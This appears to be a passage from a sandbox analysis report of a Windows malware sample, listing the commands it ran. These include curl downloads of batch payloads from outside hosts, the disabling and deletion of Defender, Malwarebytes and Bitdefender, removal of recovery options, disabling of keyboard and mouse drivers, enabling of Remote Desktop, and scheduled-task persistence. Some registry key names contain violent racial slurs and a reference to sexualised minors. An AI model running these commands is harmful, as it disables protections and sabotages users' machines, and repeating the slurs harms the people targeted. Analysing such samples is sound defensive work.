PID 5500 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5500 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5500 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5500 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5500 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5500 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5500 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5500 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5500 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\schtasks.exe
PID 5500 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\schtasks.exe
PID 4924 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3544 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 3544 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 3544 wrote to memory of 5540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3544 wrote to memory of 5540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3544 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3544 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3544 wrote to memory of 3908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 3908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3544 wrote to memory of 280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "

C:\Windows\system32\curl.exe

curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"

C:\Windows\system32\curl.exe

curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"

C:\Windows\system32\openfiles.exe

openfiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "(new-object -com shell.application).minimizeall()"

C:\Windows\system32\curl.exe

curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\cmd.exe

cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\netsh.exe

netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f

C:\Windows\system32\ReAgentc.exe

reagentc /disable

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue {default} recoveryenabled

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableAntiTamper $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbam.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM MBAMService.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamscheduler.exe /T

C:\Windows\system32\sc.exe

sc stop MBAMService

C:\Windows\system32\sc.exe

sc delete MBAMService

C:\Windows\system32\sc.exe

sc stop MBAMProtector

C:\Windows\system32\sc.exe

sc delete MBAMProtector

C:\Windows\system32\sc.exe

sc stop MBAMChameleon

C:\Windows\system32\sc.exe

sc delete MBAMChameleon

C:\Windows\system32\sc.exe

sc stop MBAMFarflt

C:\Windows\system32\sc.exe

sc delete MBAMFarflt

C:\Windows\system32\sc.exe

sc stop MBAMSwissArmy

C:\Windows\system32\sc.exe

sc delete MBAMSwissArmy

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdservicehost.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdagent.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdredline.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdparentalservice.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdreinit.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdsubwiz.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM seccenter.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM vsserv.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM epssecurityservice.exe /T

C:\Windows\system32\sc.exe

sc stop bdservicehost

C:\Windows\system32\sc.exe

sc delete bdservicehost

C:\Windows\system32\sc.exe

sc stop bdagent

C:\Windows\system32\sc.exe

sc delete bdagent

C:\Windows\system32\sc.exe

sc stop bdredline

C:\Windows\system32\sc.exe

sc delete bdredline

C:\Windows\system32\sc.exe

sc stop bdparentalservice

C:\Windows\system32\sc.exe

sc delete bdparentalservice

C:\Windows\system32\sc.exe

sc stop bdreinit

C:\Windows\system32\sc.exe

sc delete bdreinit

C:\Windows\system32\sc.exe

sc stop bdsubwiz

C:\Windows\system32\sc.exe

sc delete bdsubwiz

C:\Windows\system32\sc.exe

sc stop seccenter

C:\Windows\system32\sc.exe

sc delete seccenter

C:\Windows\system32\sc.exe

sc stop vsserv

C:\Windows\system32\sc.exe

sc delete vsserv

C:\Windows\system32\sc.exe

sc stop epssecurityservice

C:\Windows\system32\sc.exe

sc delete epssecurityservice

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc delete WinDefend

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc delete SecurityHealthService

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc delete Sense

C:\Windows\system32\taskkill.exe

taskkill /F /IM MsMpEng.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM MpCmdRun.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM SecurityHealthSystray.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM smartscreen.exe /T

C:\Windows\system32\takeown.exe

takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\Windows Defender" /r /d y

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\notepad.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\calc.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\powercfg.exe

powercfg /hibernate off REM Disables hibernation

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "Device Name"

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "USB Root Hub"

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCR\behead all niggers" /f

C:\Windows\system32\reg.exe

reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

